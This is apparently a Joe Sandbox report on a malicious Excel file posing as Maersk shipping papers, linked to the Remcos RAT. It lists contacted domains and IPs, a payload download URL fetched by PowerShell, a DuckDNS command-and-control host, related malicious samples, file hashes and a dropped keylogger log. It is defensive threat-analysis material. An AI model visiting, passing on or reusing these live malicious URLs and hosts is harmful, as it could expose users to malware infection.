                                                                                                                                                                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://cdn.at.atwola.com/_media/uac/msn.htmlbhvCD3E.tmp.26.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://38.240.44.9/590/nicefeaturesworkinggreat.TifC:powershell.exe, 00000013.00000002.514899647.000000001A5DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://www.nirsoft.netpRegAsm.exe, 0000001A.00000002.511931373.0000000000334000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://wrath.me/_mshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C1F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.530346179.000000001AAEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.546607797.000000001A8D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.527099741.000000000037D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              38.240.44.9
                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                              174COGENT-174UStrue
                                                                                                                                                                                              188.114.97.3
                                                                                                                                                                                              unknownEuropean Union
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              188.114.96.3
                                                                                                                                                                                              wrath.meEuropean Union
                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              207.241.227.242
                                                                                                                                                                                              ia600102.us.archive.orgUnited States
                                                                                                                                                                                              7941INTERNET-ARCHIVEUStrue
                                                                                                                                                                                              192.3.101.184
                                                                                                                                                                                              ugnrv.duckdns.orgUnited States
                                                                                                                                                                                              36352AS-COLOCROSSINGUStrue
                                                                                                                                                                                              178.237.33.50
                                                                                                                                                                                              geoplugin.netNetherlands
                                                                                                                                                                                              8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                              Analysis ID:1529029
                                                                                                                                                                                              Start date and time:2024-10-08 15:35:39 +02:00
                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 11m 47s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                                              Number of analysed new started processes analysed:34
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                              Technologies:
                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                              • GSI enabled (VBA)
                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                              Sample name:Maersk BL, IN & PL.xls
                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/45@7/6
                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                              • Successful, ratio: 77.8%
                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                                                              • Number of executed functions: 168
                                                                                                                                                                                              • Number of non-executed functions: 323
                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                              • Found application associated with file extension: .xls
                                                                                                                                                                                              • Changed system and user locale, location and keyboard layout to French - France
                                                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                                                              • Active ActiveX Object
                                                                                                                                                                                              • Active ActiveX Object
                                                                                                                                                                                              • Scroll down
                                                                                                                                                                                              • Close Viewer
                                                                                                                                                                                              • Override analysis time to 68585.2674245496 for current running targets taking high CPU consumption
                                                                                                                                                                                              • Override analysis time to 137170.534849099 for current running targets taking high CPU consumption
                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 2104 because there are no executed function
                                                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 3852 because there are no executed function
                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                              • VT rate limit hit for: Maersk BL, IN & PL.xls
                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                              09:37:11API Interceptor93x Sleep call for process: mshta.exe modified
                                                                                                                                                                                              09:37:15API Interceptor606x Sleep call for process: powershell.exe modified
                                                                                                                                                                                              09:37:25API Interceptor20x Sleep call for process: wscript.exe modified
                                                                                                                                                                                              09:37:37API Interceptor4481502x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              38.240.44.9invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 38.240.44.9/450/RDSSSER.txt
                                                                                                                                                                                              188.114.97.3scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                              • paste.ee/d/gvOd3
                                                                                                                                                                                              IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.bayarcepat19.click/yuvr/
                                                                                                                                                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.cc101.pro/0r21/
                                                                                                                                                                                              http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                                                                                                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • filetransfer.io/data-package/eZFzMENr/download
                                                                                                                                                                                              QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • filetransfer.io/data-package/MlZtCPkK/download
                                                                                                                                                                                              https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • mairie-espondeilhan.com/
                                                                                                                                                                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • filetransfer.io/data-package/758bYd86/download
                                                                                                                                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • filetransfer.io/data-package/58PSl7si/download
                                                                                                                                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • filetransfer.io/data-package/58PSl7si/download
                                                                                                                                                                                              188.114.96.3QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • filetransfer.io/data-package/fOmsJ2bL/download
                                                                                                                                                                                              NARLOG 08.10.2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.thetahostthe.top/9r5x/
                                                                                                                                                                                              RFQ 245801.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
                                                                                                                                                                                              74qgPmarBM.exeGet hashmaliciousPonyBrowse
                                                                                                                                                                                              • kuechenundmehr.com/x.htm
                                                                                                                                                                                              PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.cc101.pro/ttiz/
                                                                                                                                                                                              http://revexhibition.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • revexhibition.pages.dev/favicon.ico
                                                                                                                                                                                              http://meta.case-page-appeal.eu/community-standard/112225492204863/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                                                                                                                                              http://www.tkmall-wholesale.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • www.tkmall-wholesale.com/
                                                                                                                                                                                              c1#U09a6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • winfileshare.com/ticket_line/llb.php
                                                                                                                                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • filetransfer.io/data-package/eZFzMENr/download
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              ugnrv.duckdns.orginvoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 192.3.101.184
                                                                                                                                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.22323.26667.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 192.3.101.254
                                                                                                                                                                                              17261710865859b5a4fbe59d9fe7633c58ddbfcf673aced5c1e11544a7b094de3c06aa9e30185.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 192.3.101.254
                                                                                                                                                                                              INV_00983.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 192.3.101.254
                                                                                                                                                                                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 192.3.101.254
                                                                                                                                                                                              Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 192.3.101.254
                                                                                                                                                                                              wrath.mePO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              PO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              PO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              geoplugin.netQPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              zYJYK66EGb.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              ISF 10+2 - SO - SO 4042 - ROTHENBERGER USA, INC#U51fa#U8ca8 TWSE0211390.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              1728373206596a852cdbe7ae697de423fbd80cabe33d7a6a584032b72164b61e0692c12d1a849.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              Salary Increase Letter_Oct 2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              September Report 24'.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              SecuriteInfo.com.FileRepMalware.12793.28433.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                              ia600102.us.archive.orgQPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              CLOUDFLARENETUSPO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.21.53.8
                                                                                                                                                                                              PO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              original (3).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              https://dvj-305jg-9h.car-financeclaim.co.uk/4-604-9vh-9h35g-h3.html#info@tintolaw.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                              PO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 104.21.73.154
                                                                                                                                                                                              114mCZlpa3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                              • 104.26.1.231
                                                                                                                                                                                              INTERNET-ARCHIVEUSQPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                              • 207.241.227.240
                                                                                                                                                                                              e6y2SzRzyr.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                              • 207.241.227.240
                                                                                                                                                                                              Wg3tf5MIzS.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                              • 207.241.227.240
                                                                                                                                                                                              9gTW6ik1Z1.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                              • 207.241.227.240
                                                                                                                                                                                              lcvKxaEBA3.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                              • 207.241.227.240
                                                                                                                                                                                              vt4hGZq9md.vbsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                              • 207.241.227.240
                                                                                                                                                                                              NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                              • 207.241.227.240
                                                                                                                                                                                              CLOUDFLARENETUSPO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.21.53.8
                                                                                                                                                                                              PO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              original (3).emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.64.41.3
                                                                                                                                                                                              https://dvj-305jg-9h.car-financeclaim.co.uk/4-604-9vh-9h35g-h3.html#info@tintolaw.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                              PO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              PO59458.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 104.21.73.154
                                                                                                                                                                                              114mCZlpa3.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                              • 104.26.1.231
                                                                                                                                                                                              COGENT-174USRQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 38.47.233.19
                                                                                                                                                                                              SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.104.25.242
                                                                                                                                                                                              SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 149.104.25.242
                                                                                                                                                                                              1156#U91d1#U5c71#U6bd2#U9738#U79bb#U7ebf#U5b89#U88c5#U5305.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 206.238.179.179
                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 154.62.186.112
                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 38.28.137.224
                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 38.42.26.199
                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 38.197.144.4
                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 38.189.154.122
                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 38.54.57.248
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              05af1f5ca1b87cc9cc9b25185115607dQPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              beNwFiUxpf.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              PO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              ls6sm8RNqn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 207.241.227.242
                                                                                                                                                                                              7dcce5b76c8b17472d024758970a406bPO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              PO20241008.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              QPS-36477.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              ordin de plat#U0103.docxGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              Oilmax Systems Updated.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              invoice_45009.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                                              No context
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):344
                                                                                                                                                                                              Entropy (8bit):3.574317156375356
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:6lJ8q5YcIeeDAlTywEcjfkySNosb3fxNa/WAv:6lJvecpvE2syQ350/W+
                                                                                                                                                                                              MD5:47825BC3208B406596F5938D4CDC459E
                                                                                                                                                                                              SHA1:E4CA9606D066F7B3FE2714984225ACA526A908DC
                                                                                                                                                                                              SHA-256:15672101BE00C98D26A4BE0358BAF2AB1F769FFA12FEAC340A9E0DF9C3D27988
                                                                                                                                                                                              SHA-512:AEE9C22C26E68F8D9E11998A0BC2761D3234BCC6F4A32E4726C9CC572F3E46844DE3D238300C06EB0BC2F2A4CF6FE5A1BBC527CDF993857B0A64BA43A993E47E
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                              Preview:....[.2.0.2.4./.1.0./.0.8. .0.9.:.3.7.:.3.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l. .-. .M.a.e.r.s.k. .B.L.,. .I.N. .&. .P.L. . .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.].].....[.C.t.r.l.L.].....[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):15189
                                                                                                                                                                                              Entropy (8bit):5.0343247648743
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                                                                                                                                              MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                                                                                                                                              SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                                                                                                                                              SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                                                                                                                                              SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
